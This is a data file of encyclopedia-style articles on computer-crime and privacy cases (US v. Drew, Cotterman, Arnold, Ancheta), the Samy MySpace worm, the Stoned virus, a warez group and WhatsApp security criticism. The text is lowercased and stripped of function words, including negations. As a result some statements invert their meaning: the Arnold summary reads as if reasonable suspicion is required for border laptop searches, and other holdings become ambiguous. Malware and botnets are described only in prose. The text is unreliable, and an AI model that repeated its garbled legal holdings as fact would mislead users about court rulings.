    <t>united states drew, f.r.d. (c.d. cal. 2009), american federal criminal case u.s. government charged lori drew violations computer fraud abuse (cfaa) alleged cyberbullying 13-year-old neighbor, megan meier, committed suicide. jury deadlocked felony conspiracy count acquitted drew three felony cfaa violations, found guilty lesser included misdemeanor violations; judge overturned convictions response subsequent motion acquittal drew. allegations leading indictment trial 2006, lori drew (née shreeves) lived charles county, missouri, husband curt teenaged daughter, sarah. megan meier, time friends sarah drew, lived street drew.during summer 2006, drew reportedly became concerned meier spreading false statements daughter. lori drew, sarah drew, drew's employee, ashley grills, allegedly decided create fake myspace account 16-year-old alias "josh evans". they allegedly used account discover whether meier spreading false statements sarah drew.a myspace account name "josh evans" created september 2006. drew allegedly used myspace account contact meier, apparently believed "josh evans" 16-year-old boy. "josh evans" communicated meier october 2006, myspace account manner described prosecution flirtatious.on october 2006, "josh evans" reportedly sent meier message effect world would better place without her. additional myspace members whose profiles reflected links "josh evans" profile also began send meier negative messages. subsequently, meier's mother discovered daughter hanged bedroom closet.after meier's death, according indictment, lori drew removed fake "josh evans" account commanded juvenile knew fake account "keep mouth shut". legal history early december 2007, missouri prosecutors announced would file charges lori drew connection megan meier's death. press conference, charles county prosecutor jack banas stated enough evidence bring charges. result, federal government decided pursue case angeles, myspace based.the meiers file civil lawsuit. indictment thomas o'brien, u.s. attorney central district california, undertook prosecution federal charges connection case. 2008, drew indicted grand jury united states district court central district california four counts. first count alleged conspiracy arising charged violation u.s.c. 371, namely drew co-conspirators agreed violate cfaa intentionally accessing computer used interstate commerce "without authorization" "excess authorized use", using interstate communication obtain information computer order inflict emotional distress violation u.s.c. 1030(a)(2)(c). counts four allege drew violated cfaa accessing myspace servers obtain information regarding meier breach myspace terms service, september 2006 october 2006. amicus brief support defendant september 2008, electronic frontier foundation filed amicus brief support drew's motion dismiss indictment. brief argued drew's indictment wrongful drew's alleged violation myspace terms conditions "unauthorized access" "exceeds authorized access" cfaa statute; applying cfaa drew's conduct would constitute serious encroachment civil liberties; interpreting cfaa apply breach website's terms service would violate process protections constitution thereby render statute void grounds vagueness lack fair notice. jury trial split verdict this jury announced november 2008 deadlocked count conspiracy. unanimously found drew guilty counts four, convicted lesser included misdemeanor offenses three counts. motion acquittal granted november 2008, drew filed motion acquittal. august 2009, u.s. district judge george formally granted drew's motion acquittal, overturning jury's guilty verdict three misdemeanor cfaa violations.in opinion, examined element misdemeanor offense, noting misdemeanor conviction u.s.c. 1030(a)(2)(c) requires that: defendant intentionally accessed computer without authorization, exceeded authorized access computer access computer involved interstate foreign communication engaging conduct, defendant obtained information computer used interstate foreign commerce communicationwu found many courts held computer provides web-based application accessible internet would satisfy interstate communication requirement second element, third element whenever person using computer contacts internet website reads part website. issue arose respect first element, meaning undefined term "unauthorized access". noted government's concession basis claiming drew intentionally accessed myspace's computers without authorization creation false "josh evans" alias violation myspace terms service. reasoned that, conscious violation terms service sufficient satisfy first element, drew's motion acquittal would granted reason alone. found intentional breach myspace terms service could possibly satisfy definition unauthorized access access exceeding authorization, rooting cfaa misdemeanor violation individual's conscious violation website's terms service would render statute void vagueness insufficient guidelines govern enforcement well lack actual notice public. cited several reasons individual would lacking actual notice: statute explicitly state criminalizing breaches contract, individuals aware contract breach typically subject criminal prosecution website's terms service control "authorized" "exceeds authorization", statute would unconstitutionally vague would unclear whether violations terms service would constitute "unauthorized" access allowing conscious violation website's terms service misdemeanor violation cfaa would essentially give website owner power define criminal conductwu summed opinion stating allowing violation website's terms service constitute intentional access computer without authorization exceeding authorization would "result transforming section 1030(a)(2)(c) overwhelmingly overbroad enactment would convert multitude otherwise innocent internet users misdemeanant criminals." reasons, granted drew's motion acquittal. government appeal. legislative responses missouri legislators amended state's harassment include penalties bullying computers, electronic devices, text messages. bill approved 2008. more twenty states enacted legislation address bullying occurs electronic media. these laws include statutes mandate school boards must adopt policies address cyberbullying, statutes criminalize harassing minors online, statutes providing cyberbullying education. california enacted cal. educ. code §32261 encourages schools agencies develop strategies, programs activities reduce bullying electronic means.a bill introduced congress 2009 (h.r. 1966) federal standard definition term cyberbullying, proposal criticized overbroad advance. reactions legal experts expressed concern prosecution sought effectively criminalize violation site terms service. andrew grossman, senior legal analyst heritage foundation, said verdict stands means every site internet gets define criminal law. that's radical change. what used small-stakes contracts become high-stakes criminal prohibitions."law professor orin kerr, drew's bono attorneys, commented "very pleased" vacated guilty verdict case extremely important test case scope computer crime statutes, tremendously high stakes civil liberties every internet user". also cyberbullying lvrc holdings brekka social media suicide united states nosal virtual crime references</t>
  </si>
  <si>
    <t>United States v. Cotterman</t>
  </si>
  <si>
    <t>united states cotterman, (9th cir. banc 2013), united states court case united states court appeals ninth circuit held property, laptop electronic storage devices, presented inspection entering united states border subject forensic examination without reason suspicion, holding weakened border search exception fourth amendment united states constitution. background april 2007 approximately howard maureen cotterman drove mexico lukeville port entry (poe). upon arrival, inspector checked u.s. customs border protection, cbp, electronic database found computer-generated alert, based upon howard cotterman's prior conviction child crimes 1992. alert advised inspector lookout child pornography warning, cottermans sent secondary inspection area.during vehicle search, officers discovered laptops three digital cameras. officers unable find contraband, discover number password protected files. during time, case assigned agent riley, drove supervisor agent brisbane sells, arizona lukeville. during drive, agents decided would detain laptops forensic examination. after arriving lukeville 3:30 agents interviewed howard maureen cotterman separately. howard cotterman offered help agents computer, offer declined. agents left laptops digital camera. devices taken tucson delivered john owens, computer forensic examiner night. camera returned cottermans evidence contraband found. however, april agent owens' forensic examination turned approximately images child pornography howard cotterman's computer. agent owens called cottermans night, asking howard cotterman assistance opening password protected files. howard cotterman agreed come next day, wife showed pick laptop.it later discovered howard cotterman boarded flight mexico april 2007, final destination sydney, australia. april 2007, agent owen able break computer security discovered images child pornography. cotterman indicted june 2007 several charges related child pornography unlawful flight avoid prosecution. arrested australian officials delivered u.s. marshals service march 2008.cotterman filed motion suppress evidence seized customs officials argued search laptop miles port entry period four days non-routine border search requiring reasonable suspicion." motion granted district court cotterman's favor. government appealed, stated border search doctrine justified initial search transport computer tucson adequately conduct search. ninth circuit court appeals overturned lower court's ruling, favor government. opinion ninth circuit panel majority opinion, judge tallman agreed government border search doctrine allowed property transported secondary site examination. however, also stated government cannot seize property hold "weeks, months, years whim" effectively allowing courts continue determine whether searches seizures reasonable case-to-case basis. arguments when appealing district court's decision, government argue reasonable suspicion. instead, government argued border search doctrine supported initial search transportation laptop tucson examination. judgment majority found time distance matter instance. opinion, judge tallman stated need control entry border. government unable remove property away border, would fully staff equip border crossing content blindly shutting eyes, positions unreasonable. since defendant's property never cleared entry, functionally still border time forensic search. opinion, judge tallman stated: time space relevant initial inquiry extent inform whether individual would reasonably expect stopped searched geographic point beyond international border. majority also found reasonable suspicion needed since considered inspection routine search. there body search property destroyed. finally, court ruled consider two-day delay particularly offensive. dissent judge fletcher dissented majority. argued "sticking point" whether government could transport property border another location inspection, whether government could seize property inspection unknown amount time reason suspect property contained contraband. would hold officers must level particularized suspicion order conduct seizure search like issue here, seizing one's personal property deprives individual valid possessory interest property, authorizing generalized computer forensic search (untethered particularized suspicion) permits government engage type generalized fishing expeditions fourth amendment designed prevent. opinion banc reversing reasoning panel, ninth circuit held forensic examination computer seized border requires reasonable suspicion. court also held reasonable suspicion case alert informing seizing officer possibility child pornography. supreme court appeal petition writ certiorari filed united states supreme court august 2013, several extensions time. ninth circuit violate constitution, create circuit splits, contravene court's decisions, subvert appellate process replacing question presented parties issue prosecution deliberately abandoned, making factual finding (i.e. reasonable suspicion existed) first time appeal disregarded factual findings district court agents scene, holding citizen's personal belongings seized border suspicion wrongdoing? january 2014, court denied petition certiorari. march 2014, court denied petition rehearing filed february 2014, letting ninth circuit's decision stand, along reasonable suspicion standard created. criminal conviction september 2014, cotterman sentenced chief u.s. district judge raner collins serve years prison child exploitation offenses. following trial june 2014, cotterman found guilty counts production child pornography, count transportation child pornography, count possession child pornography, count importation obscene material. cotterman's term imprisonment followed lifetime supervised release, stringent offender conditions, including condition register offender.on june 2007, cotterman indicted federal grand jury. investigation revealed cotterman sexually abused young girl multiple times two-year period, beginning seven years old. photographs videos abuse discovered cotterman's laptop crossed international border mexico arizona.cotterman previously convicted 1992 california thirty-three offenses, included counts minor sexual conduct, counts lewd lascivious conduct upon child, three counts annoy/molest child. also united states arnold fourth amendment united states constitution border search exception boucher references external links convicted offender sought tucson located australia jost justice: judge computer searches border</t>
  </si>
  <si>
    <t>United States v. Arnold</t>
  </si>
  <si>
    <t>united states arnold, f.3d 1003 (9th cir. 2008), united states court case united states court appeals ninth circuit held fourth amendment united states constitution require government agents reasonable suspicion searching laptops digital devices border, including international airports.this decision caused worry controversy among fourth amendment advocates, electronic frontier foundation. especially troubled legitimately store sensitive business, legal, customer data; worry federal agents might leak information found laptop searches. several legislators discussed introduced measures counter ruling order provide protection travelers, none become law. background case july 2005, michael arnold arrived angeles international airport (lax) spending three-week vacation philippines. after retrieving luggage, arnold proceeded checkpoint customs. customs border protection (cbp) officer laura peng arnold waiting line selected secondary questioning. peng questioned arnold, began inspecting luggage, noting laptop computer several computer accessories. peng instructed arnold turn computer could functioning. officer john roberts called assist inspection computer booting among icons displayed computer's desktop, named "kodak pictures" named "kodak memories". peng roberts opened folders, began viewing photos, noted depicted nude women. point special agents u.s. department homeland security, immigration customs enforcement (ice) called. arnold detained questioned agents several hours. they examined computer equipment, found numerous images believed child pornography. arnold released, computer seized agents. federal agents obtained warrant weeks later. arnold charged knowingly transporting child pornography, knowingly possessing computer hard drive compact discs contained image child pornography, knowingly intentionally traveling foreign commerce attempting engage illicit sexual conduct person years age.arnold filed motion suppress, argued government required reasonable suspicion conduct search. this motion granted district court, ruling arnold's favor. government promptly appealed case, stated border doctrine took precedence fourth amendment's protection unreasonable search. ninth circuit court appeals overturned lower court's ruling, holding favor government. arnold represented district court ninth circuit marilyn bednarski kevin lahue, kaye, mclane, bednarski, litt. arguments reasonable search crux arnold's argument laptop similar person's home human mind, much ordinary container data. argument based notion laptop ability store greater amount data personal documents, much like stored one's home. continued argue laptop able record ideas, e-mail, internet chats, web-surfing habits, similar "human mind." under arguments sought protection fourth amendment, states "the right people secure persons, houses, papers, effects, unreasonable searches seizures, shall violated ".arnold also raised exception government's searches limited cases "particularly offensive manner," argued case officers seized searched laptop. electronic frontier foundation filed amicus brief support arnold. amici included association corporate travel executives (acte). brief argued government's position current practice subjects travelers unconstitutional invasive searches laptops devices. their argument similar already made arnold, contended mainly computer different tank, suitcase, closed container laptops routinely contain personal information person's life. moreover, amici concerned search would reveal information already protected statutes, including privileged legal communications, reporters' notes confidential sources, trade secrets. summary, main points brief that: people reasonable expectation privacy information stored laptop computers; searches personal electronic information devices particularly invasive personal privacy; volume information stored computers means privacy invasion laptop border search enormous; personal computers often contain information individual know about, even sought erase; laptop computer searches indistinguishable "general searches;" real risk unconstrained "pretext" searches; first amendment protects many contents laptop computers. final point raised worry indiscriminate searches information stored laptops discourage people storing sensitive data, thus causing chilling effect speech. personal computer among person's private belongings. laptop computers virtual extensions mind, used record share thoughts, feelings, activities; indeed, "they postal services, playgrounds, jukeboxes, dating services, movie theaters, daily planners, shopping malls, personal secretaries, virtual diaries, more." [a]s result, laptop computers contain much information homes contain perhaps more. overall, amici concerned unchecked compliance border doctrine would infringe citizen's first fourth amendment rights. view, doctrine provide protection meant enact, technology provides ways maneuver around smuggler's 'container choice' electronic contraband internet. they simply email post online avoid customs searches. ruling overturns decision would undermine government's ability protect borders." border doctrine response arnold's motion suppress, government argued points. firstly, fourth amendment require reasonable suspicion border doctrine. secondly, even reasonable suspicion required, present. government argued united states duty take measures ensure safety interior. past cases stated axiomatic united states, sovereign, inherent authority protect, paramount interest protecting, territorial integrity." united states ramsey, court stated "searches made border reasonable simply virtue fact occur border case arnold, point linked conclusions together notion international american airports functional equivalent border, stated almeida-sanchez united states.reference also made history searches closed containers briefcases, purses, wallets, pockets, pictures, film, graphic material. these items equivalent closed container, traditionally searched border without particularized suspicion. acknowledged limits made, specifically traveler's alimentary canal. such limitations made searching person, objects possession, interest human dignity privacy, fourth amendment protects. judgment reasonable search court addressed argument search arnold's laptop carried particularly offensive manner, destructive required particularized suspicion. court acknowledged precedent declare border search deemed unreasonable. supreme court left open question circumstances make search particularly offensive, thus unreasonable. however, court pointed arnold never claimed laptop damaged government's search.even without clear scale determine offensive search court dismissed reasoning district court particularized suspicion needed case arnold. district court-based decision previous cases related search human body, property. border doctrine court distinguished searches american airports considered border searches, occur "functional equivalent border". previously, supreme court stated that: authority united states search baggage arriving international travelers based inherent sovereign authority protect territorial integrity. reason authority, entitled require whoever seeks entry must establish right enter bring country whatever carry address arnold's claim laptop like home, therefore requires fourth amendment protection, court dismissed argument without merit. decision based previous supreme court judgments denied fourth amendment protections property also "capable functioning home."lastly, court addressed comparison united states ickes, f.3d (4th cir. 2005). case, man's stopped searched driving canada united states. court upheld border search doctrine, ninth circuit acknowledged concerns followed reasoning carving first amendment exception border doctrine would protect terrorist communications "which inherently 'expressive'"; create unworkable standard government agents "would decide feet expressive material covered first amendment"; contravene weight supreme court precedent refusing subject government action greater scrutiny respect fourth amendment alleged first amendment interest also stake." reasoning, court justified government's interest preventing unwanted persons effects greater person's desire conceal contents baggage. decision district court overturned, ruling favor government. subsequent developments death arnold february 2009, supreme court united states notified arnold's counsel denied arnold's petition writ certiorari. attorneys arnold filed motion de-publish ninth circuit opinion (which denied). motion, arnold's counsel explained days informed supreme court's refusal hear appeal, arnold committed suicide. controversy this ruling caused much controversy discussion among first fourth amendment rights activists, including american civil liberties union electronic frontier foundation. primary points controversy court's ruling laptop different type container. just arnold argued, critics argue laptop contains sensitive personal data ordinary container. they continue state laptop search revealing invasive fourth amendment requires agents reasonable suspicion justify intrusion.the electronic frontier foundation expressed disappointment statement: opinion almost certainly wrong classify laptop searches different property searches. fourth amendment constrains police conducting arbitrary searches, implements respect social privacy norms, seeks maintain traditional privacy rights face technological changes. this arnold opinion fails protect travelers traditional fourth amendment ways. other critics cited documents data need legitimately kept secret discreet, worried nothing prevent officials involved search disclosing sensitive data. they give examples trade secrets, acquisition plans, plans product, security data private customers. concern officials process searching copy leak information without consent. most unwilling trust government officials employees misuse seize negligently disclose confidential information. department homeland security policies arnold august 2008, washington post reported department homeland security policies allow federal agents "take traveler's laptop computer electronic device off-site location unspecified period time without suspicion wrongdoing." further, "officials share copies laptop's contents agencies private entities language translation, data decryption reasons." senator russell feingold called policies "truly alarming" said intends introduce legislation soon would require reasonable suspicion border searches, well prohibit profiling race, religion, national origin. meanwhile, ryan singel wired.com recommended placing one's electronics papers first class u.s. mail envelope stamp it—or even better mail trip," since 'officers read permit others read correspondence contained sealed letter class mail (the international equivalent first class) without appropriate search warrant consent'. however, applies articles postal system, letters carried individuals private carriers dhl, ups, fedex. travelers privacy protection senator feingold, fellow democratic senator maria cantwell, democratic representative adam smith announced september 2008, proposed limit searches laptops electronic devices cases united states customs border protection officials reasonable suspicion illegal activity. so-called travelers' privacy protection would allow border agents search electronic devices reasonable suspicions wrongdoing. addition, legislation would limit length time device could owner's possession hours, search becomes seizure, requiring probable cause. this bill introduced, never became starting 111th session congress. also border search exception computer forensics carroll united states (1925) olmstead united states (1928) united states ramsey (1977) california acevedo (1991) united states flores-montano (2004) united states cotterman (2013) references external links text available from: courtlistener google scholar circuit (slip opinion) informationweek: business, cyber liberties groups fight laptop searches</t>
  </si>
  <si>
    <t>United States v. Ancheta</t>
  </si>
  <si>
    <t>united states america ancheta (u.s. ancheta, 06-051 (c.d. cal.)) name lawsuit jeanson james ancheta downey, california u.s. government handled united states district court central district california. this first botnet related prosecution history. case summary ancheta violated prohibited acts accessing transmitting malware intent consequence disrupting interstate foreign commerce. case first prosecution united states america individual sentenced prison profiting botnets used maliciously launch destructive denial service attacks sending large quantities spam across internet. 57-month prison sentence ancheta longest history defendant spread malware. ancheta pleaded guilty conspiring violate computer fraud abuse causing damage computers used federal government united states national defence accessing protected computer without authorization purpose commit various types fraud. between dates june 2004 september 2004 angeles county ancheta others knowingly conspired violate u.s.c. 1030(a)(5)(a)(i), u.s.c. 1030(a)(5)(b)(i) u.s.c. 1030(b) code. this refers knowingly causing transmission program, information, code command result conduct cause damage without authorization computer used interstate foreign commerce communication cause loss one-year period aggregating least $5000 value. secondly acheta others conspired violate u.s.c. 1037(a)(1), u.s.c. 1037(b)(2)(a), u.s.c. 1037(b)(2)(f) code. this refers access without authorization computer used interstate foreign commerce communication, intentionally intimate transmission computer multiple commercial electronic email messages affect interstate foreign commerce. finally ancheta charged laundering monetary instruments u.s.c. 1956(a)(1)(a)(i) faced criminal forfeiture u.s.c. u.s.c. 853. case technical details internet bots botnets jeanson james ancheta time crime 20-year-old high school drop-out. found rxbot software online decided going create botnet army. once established, website would rent computer zombies hackers could employ fulfill whatever malicious planned. ancheta used least computer system place residence accessed internet dial telephone line configure command botnet conduct business communication. co-conspirator residing boca raton, florida referred sobe also involved, previous experience launching computer attacks. internet program infects computer enables remote control computer. security vulnerability computer system exploited hacker order install malware; case worm. program installs background process daemon remains undetectable computer user. infected computer often referred zombie computer ancheta depended building block botnet army. ancheta engaged computers function unison network formation; referred botnet controller called herder. ancheta's primary purpose engaging large numbers computers amplify attack reduce time taken execute their greatest value provide relatively high level anonymity.in 2005, federal trade commission conjunction government agencies organized initiative encourage internet service providers actively monitor, identify quarantine customers whose computers appeared compromised, transformed zombies, appear remote control hackers. largest botnet implementations around time (2005) found dutch police botnet million computers crime ring's control. these zombie computers often employed response anti-spam laws spam filtering. spammers started hiring virus writers hackers help architect armies zombie computers send spam email unsuspecting users' computers around world. february 2012, federal communications commission unveiled another plan calls internet service providers take specific steps combat online threats botnets. setup worm development july 2004 ancheta obtained access server internet hosting company, server utilizing ircd program, created channel controlled remotely. ancheta developed computer worm installed executed would report back channel controlled, scan computers similar vulnerabilities, leave open future unauthorized control. ancheta initially developed worm modifying existing trojan called rxbot. while ddos attacks case botnets, another major purpose proxy server email spam propagation. 2004 reported unsolicited email doubled late 2003, rising billion message billion messages. worms like conficker originally found 2008 still remain threat significantly sophisticated, disallowing updates communicated encrypted channels. profiting ancheta advertised sale bots purpose launching distributed denial-of-service (ddos) attacks send spam. sold access bots clusters, usually 10,000 time. ancheta acted consultant advised buyer exact number bots would need successfully accomplish designated attack. would offer separate channels additional cost assist control direction bots, providing temporary control channel buyer. around time crime, estimated average botnet 20,000 computers size. also profited sale developed worm would configure best propagation. buyers also option using malware launch attack worm offering. ancheta accepted payments paypal, would misleadingly describe nature transaction hosting, hosting, dedicated services. case legal details total different counts case. conspiracy commit offense defraud agency count violation u.s.c. 371. this refers conspiracy ancheta others commit offense defraud agency. this violated u.s.c. 1030(a)(5)(a)(i), u.s.c. 1030(a)(5)(b)(i) u.s.c. 1030(b) code. fraud related activity connection computers counts violation u.s.c. 1030(a)(5)(a)(i), u.s.c. 1030(a)(5)(b)(v) u.s.c. 1030(b) counts involved intentionally causing damage accessing unauthorized computer belonging king electronic sanyo electric software completed would caused damage exceeding $5000 launching distributed denial service (ddos) attack company (whose name remains confidential) completed would caused damage exceeding $5000. furtherance conspiracy ancheta committed various overt acts, including payments accomplices, directing numerous computers adware servers controlled ancheta himself. these servers unsuspecting users would redirected download malware. counts included knowingly causing transmission malicious code protected computers belonging naval weapons station china lake defense information systems agency; used justice, national defence, national security. naws china lake major navy research, testing evaluation facility disa provides communication support president executive staff government. count violation u.s.c. 1030(a)(4) u.s.c. 1030(b). ancheta knowingly accessed without authorization, computers involved interstate foreign commerce installing adware without notice, consent sole intent defraud. between 8,744 53,321 computers (different count) accessed without authorization monetary amounts $1306.52 7966.10 (different count) accepted payment services. laundering monetary instruments counts violation u.s.c. 1956(a)(1)(a)(i). knowing property involved financial transaction represents proceeds unlawful activity, ancheta conducted financial transactions involved proceeds specified unlawful activity proceeds used intent promote unlawful activity. proceeds selling worms rental botnet passed legitimate online transactions payments hosting dedicated services. anchta also transferring payments internet hosting companies additional access servers used commit fraud. from november 2004 2005 varying amounts funds transferred wells fargo bank fdcservers sago networks. criminal forfeiture count violation u.s.c. u.s.c. 853. ancheta required forfeit property involved offence. this included $2998.81 generated sale internet bots proxies deposited wells fargo account, approximately $58,357.86 proceeds generated surreptitious install adware protected computers linked paypal account owned ancheta, 1993 property used commit facilitate commission violations including desktop computers, laptops hard drives. summary laws applied u.s.c. 371: conspiracy commit offense defraud united states u.s.c. 853: criminal forfeiture u.s.c. 982: criminal forfeiture u.s.c. 1037(a)(1): fraud related activity connection email u.s.c. 1037(b)(2)(a): fraud related activity connection email u.s.c. 1037(b)(2)(f): fraud related activity connection email u.s.c. 1030(a)(3): computer trespassing government computer u.s.c. 1030(a)(4): committing fraud protected computer u.s.c. 1030(a)(5)(a)(i): damaging protected computer (including viruses, worms) u.s.c. 1030(a)(5)(b)(i): damaging protected computer (including viruses, worms) u.s.c. 1030(b): conspiracy violate u.s.c. 1956(a)(1)(a)(i): laundering monetary instruments also computer crime computer worm computer fraud abuse references external links text decision department justice ancheta case wired.com how-to: build botnet open source software</t>
  </si>
  <si>
    <t>United States Armed Forces nude photo scandal</t>
  </si>
  <si>
    <t>march 2017, nude photo scandal united states armed forces uncovered reported center investigative reporting horse. early reporting, believed scandal contained marine corps, subsequently revealed involve rest military. incident closed facebook group called "marines united," consisted 30,000 active duty retired members united states armed forces british royal marines, hundreds photos female servicemembers every branch military distributed. page included links dropbox google drive even images. after facebook group shutdown, members original group redirected groups. post original group page, member wrote, would hilarious (naval criminal investigative service) fucks found wife here." instance, group called "marines united created 3,000 members. group, user identified garret bailey wrote, fuck snitches… blast every goddamn page fucking sandbox back. understand this: accept request person served. haven’t, don’t fucking them!!! someone know fucking snitch, admin know. this shit never made national fucking news." investigation naval criminal investigative service launched investigation incident. reactions department defense mattis, secretary defense, said, "the purported actions civilian military personnel social media websites, including associated marines united group possibly others, represent egregious violations fundamental values uphold department defense." robert neller, commandant marine corps, said, "for anyone target marines, online otherwise, inappropriate manner, distasteful shows absence respect." ronald green, sergeant major marine corps, said, "these negative behaviors absolutely contrary represent." marine corps spokesman ryan alvis thanked thomas brennan uncovering scandal, saying, allowed take immediate action explicit photos taken prepare support potential victims." u.s. congress senator kirsten gillibrand, member senate armed services committee, called hearing incident. representative adam smith, ranking member house armed services committee, called online behavior "degrading, dangerous, completely unacceptable." also invisible references</t>
  </si>
  <si>
    <t>Samy (computer worm)</t>
  </si>
  <si>
    <t>samy (also known js.spacehero) cross-site scripting worm (xss worm) designed propagate across social networking site myspace samy kamkar. within hours october 2005 release, million users payload making samy fastest-spreading virus time. worm relatively harmless; carried payload would display string "but all, samy hero" victim's myspace profile page well send samy friend request. when user viewed profile page, payload would replicated planted profile page continuing distribution worm. myspace since secured site vulnerability.samy kamkar, author worm, raided united states secret service electronic crimes task force 2006 releasing worm. entered plea agreement january 2007 felony charge. action resulted kamkar sentenced three years' probation computer access internet, days' community service, $15,000–20,000 restitution, directly reported kamkar "greatest moments hacking history" vice media's video website, motherboard. references external links motherboard s01e03 greatest moments hacking history: samy kamkar takes down myspace interview samy kamkar slashdot.org discussion technical explanation myspace worm darknet diaries samy (episode</t>
  </si>
  <si>
    <t>Stoned (computer virus)</t>
  </si>
  <si>
    <t>stoned boot sector computer virus created 1987. first viruses thought written student wellington, zealand. 1989 spread widely zealand australia, variants became common worldwide early 1990s.a computer infected original version eight probability screen would declare: "your stoned!", phrase found infected boot sectors infected floppy disks master boot records infected hard disks, along phrase "legalise marijuana". later variants produced range messages. original version original "your stoned. legalise marijuana" thought written student wellington, zealand.this initial version appears written someone experience 360kb floppy drives, misbehaves 1.2mb floppy, systems files root directory. higher capacity disks, disks, original boot sector overwrite portion directory. message displays boot time exactly divisible many clones time, boot times could vary, message would display randomly time compatible machines original computers, boot time constant, infected computer would either never display message always display message. infected computer 360k disk 20mb less hard disk, never displayed message first examples asymptomatic virus carrier, would work impediment function, would infect disks inserted hard disks, original master boot record moved cylinder head sector floppy disks, original boot sector moved cylinder head sector last directory sector disks. virus "safely" overwrite boot sector root directory files. typically infected booting infected diskette. computers, time, would default booting diskette drive diskette. virus spread floppy diskette accessed infected computer. that diskette now, itself, source spread virus. this much like recessive gene difficult eliminate user could number infected diskettes systems infected virus unless inadvertently boot infected diskette. cleaning computer without cleaning diskettes left user susceptible repeat infection. method also furthered spread virus borrowed diskettes, placed system, able carry virus host. variants virus image easily modified (patched); particular person knowledge programming alter message displayed. many variants stoned circulated, different messages. beijing, bloody! virus string "bloody! jun. 1989". date, tiananmen square protests suppressed people's republic china. swedish disaster virus string "the swedish disaster". manitoba manitoba activation routine store original boot sector floppies; manitoba simply overwrites original boot sector. 2.88mb floppies corrupted virus. manitoba uses memory resident. noint, bloomington, stoned noint tries stop programs detecting this causes read errors computer tries access partition table. systems infected noint decrease base memory. flame, stamford variant stoned called flame (later unrelated sophisticated malware given name). early flame uses memory. stores original boot sector master boot record cylinder head sector regardless media. flame saves current month system infected. when month changes, flame displays colored flames screen overwrites master boot record. angelina angelina stealth mechanisms. hard disks, original master boot record moved cylinder head sector angelina contains following embedded text, displayed virus: "greetings angelina!!!/by garfield/zielona gora" (zielona góra town poland). october 1995 angelina discovered factory-sealed seagate technology 5850 (850mb) drives.in 2007 batch medion laptops sold aldi supermarket chain appeared infected angelina. medion press release explained virus really present; rather, spurious warning caused pre-installed antivirus software, bullguard. patch released error. bullguard malfunction highlights issues (along loss performance frustrating pop-ups asking user money) oems pre-installing microsoft internally referred "craplets" onto windows make licensing costs windows. practice widely condemned tech media, even reporters usually friendly microsoft. bitcoin blockchain incident 2014, signature stoned virus inserted bitcoin blockchain. this caused microsoft security essentials recognize copies blockchain virus, prompting remove file question, subsequently forcing node reload block chain point, continuing cycle.only signature virus inserted blockchain; virus there, were, would able function.the situation averted shortly thereafter, microsoft prevented blockchain recognized stoned. microsoft security essentials lose ability detect real instance stoned. also brain (computer virus), earlier boot sector virus michelangelo (computer virus), boot sector virus based stoned comparison computer viruses references</t>
  </si>
  <si>
    <t>United Software Association</t>
  </si>
  <si>
    <t>united software association (usa) warez organization released games software platform 1990s. formed co-op warez division fairlight best known "usa/flt". formed result split several members another noteworthy group, humble guys (thg). members, genesis notsohumble babe, left thg, eventually resulting public displays animosity.usa subdivision known "usa-dox" responsible transcribing otherwise typing documentation accompany release. this division also carried genesis thg, previously documentation division known "humbledox". news late january 1992, several members usa, including mike arnolds (the grim reaper) "amy" (the notsohumble babe), arrested united states secret service cooperation farmington hills police michigan state police) carding (credit card fraud). references</t>
  </si>
  <si>
    <t>Reception and criticism of WhatsApp security and privacy features</t>
  </si>
  <si>
    <t>this article provides detailed chronological account historical reception criticism security privacy features whatsapp messaging service. 2011 2011, unidentified security researcher netherlands pseudonym "whatsapphack" published method hijack whatsapp accounts using flaw authentication process, dutch websites tweakers.net geenstijl. method involved trying person's account another phone number intercepting verification text message would sent out. "whatsapphack" provided methods accomplish symbian android operating systems. publication articles, whatsapp issued patch android symbian clients.in 2011, another security hole reported left communication whatsapp susceptible packet analysis. whatsapp communications data sent received plaintext, meaning messages could easily read packet traces available. 2012 2012 security researchers noticed updates whatsapp sent messages encryption, described cryptographic method used "broken." august year, whatsapp support staff stated messages sent "latest version" whatsapp software android (but blackberry, windows phone, symbian) encrypted, specify cryptographic method.on january 2012, unknown hacker published website made possible change status whatsapp user, long phone number associated user's account known. january whatsapp reported resolved problem. reality, whatsapp's solution block website's address, allowed windows tool made could accomplish thing. this problem since resolved institution address check currently logged-in sessions.on september 2012, heise security demonstrated whatsapi hijack whatsapp account. shortly afterward, whatsapp threatened initiate legal action developers whatsapi, opensource project, whatsapi temporarily took source code. this, however, address underlying security failure heise security claimed able successfully repeat hacking whatsapp accounts. whatsapi team since resumed active development. 2013–2015 march 2013, saudi arabia communications information technology commission (citc) issued statement mentioned possible measures whatsapp, among applications, unless service providers took serious steps comply monitoring privacy regulations.in february 2014, schleswig-holstein data protection authority advised using whatsapp, service lacked privacy protection end-to-end client-side encryption technology. late 2014, whatsapp began implementation end-to-end encryption, finished april 2016.a joint canadian-dutch government investigation launched several concerns whatsapps compliance security regulations. primary concern investigators whatsapp required users upload mobile phone's entire address book, including contact information contacts using whatsapp, mirrored whatsapp's servers. while whatsapp stored phone numbers hash, data salted. late 2015, dutch government released press statement claiming whatsapp changed hashing method, making much harder reverse, thus subsequently complied rules regulations.on december 2014, indrajeet bhuyan saurav demonstrated whatsapp message handler vulnerability, allows anyone remotely crash whatsapp sending specially crafted message. user receives message must delete whole conversation avoid crashing whatsapp upon opening conversation. early 2015, whatsapp launched client used browser, bhuyan found client security issues: whatsapp photo privacy whatsapp photo sync bug. 2016 march 2016, whatsapp introduced document-sharing feature, allows users share files contacts. whatsapp received criticism, however, default setting automatically download attachments, raised concerns downloading malware malicious files feature expands include pdfs.in august 2016, whatsapp announced start sharing account information phone number account owner aggregated analytical data, facebook. whatsapp claims address books, message content, metadata users would shared. according whatsapp, account information shared "track basic metrics often people services better fight spam whatsapp. connecting phone number facebook's systems, facebook offer better friend suggestions show relevant account them." stated "user data shared advertisers, used internally facebook services," users would given choice opt-out sharing data facebook advertisement purposes.in october 2016, article working party stated serious concerns regarding information relating updated terms service privacy policy provided users, and, consequently, validity users’ consent.from latest client april 2016, end-to-end encryption supported user's communications, including file transfers voice calls. uses curve25519 exchange, hkdf generation session keys (aes-256 mode encryption hmac-sha256 integrity verification), sha512 generating digit fingerprints users' identity keys users verify encryption. encryption prevents even company able decrypt users' communications. this update received well security professionals privacy enthusiasts, move praised amnesty international. federal bureau investigation criticized update threatening work enforcement.as april 2016, whatsapp score points electronic frontier foundation's "secure messaging scorecard". received points communications encrypted transit, communications encrypted keys provider access allowing users verify contacts' identities, past messages secure encryption keys stolen, completed recent independent security audit, security designs properly documented. missing seventh point code open independent review. 2017 january 